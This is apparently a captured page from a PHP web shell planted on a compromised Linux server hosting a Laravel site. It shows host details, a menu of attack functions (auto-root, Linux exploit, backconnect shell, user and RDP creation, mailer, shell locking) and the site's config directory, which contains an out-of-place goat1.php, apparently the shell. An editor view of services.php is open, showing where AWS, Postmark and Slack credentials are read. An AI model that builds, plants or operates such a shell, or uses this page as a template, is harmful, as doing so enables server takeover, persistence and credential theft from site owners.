Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.16
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo18.com /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
app.php
4.58
KB
-rw-rw-r--
auth.php
4.03
KB
-rw-rw-r--
broadcasting.php
502
B
-rw-rw-r--
cache.php
3.34
KB
-rw-rw-r--
database.php
5.95
KB
-rw-rw-r--
debugbar.php
17.64
KB
-rw-rw-r--
default_currency.php
16.68
KB
-rw-rw-r--
email-providers.php
4.75
KB
-rw-rw-r--
error_log
2.74
KB
-rw-r--r--
filesystems.php
2.86
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
installer.php
2.15
KB
-rw-rw-r--
larabug.php
4.63
KB
-rw-rw-r--
logging.php
4.22
KB
-rw-rw-r--
mail.php
3.41
KB
-rw-rw-r--
media-library.php
6.04
KB
-rw-rw-r--
permission.php
6.89
KB
-rw-rw-r--
queue.php
3.73
KB
-rw-rw-r--
sanctum.php
2.97
KB
-rw-rw-r--
services.php
1.01
KB
-rw-rw-r--
session.php
7.66
KB
-rw-rw-r--
verification.php
79
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : services.php
<?php return [ /* |-------------------------------------------------------------------------- | Third Party Services |-------------------------------------------------------------------------- | | This file is for storing the credentials for third party services such | as Mailgun, Postmark, AWS and more. This file provides the de facto | location for this type of information, allowing packages to have | a conventional file to locate the various service credentials. | */ 'postmark' => [ 'token' => env('POSTMARK_TOKEN'), ], 'ses' => [ 'key' => env('AWS_ACCESS_KEY_ID'), 'secret' => env('AWS_SECRET_ACCESS_KEY'), 'region' => env('AWS_DEFAULT_REGION', 'us-east-1'), ], 'resend' => [ 'key' => env('RESEND_KEY'), ], 'slack' => [ 'notifications' => [ 'bot_user_oauth_token' => env('SLACK_BOT_USER_OAUTH_TOKEN'), 'channel' => env('SLACK_BOT_USER_DEFAULT_CHANNEL'), ], ], ];
Close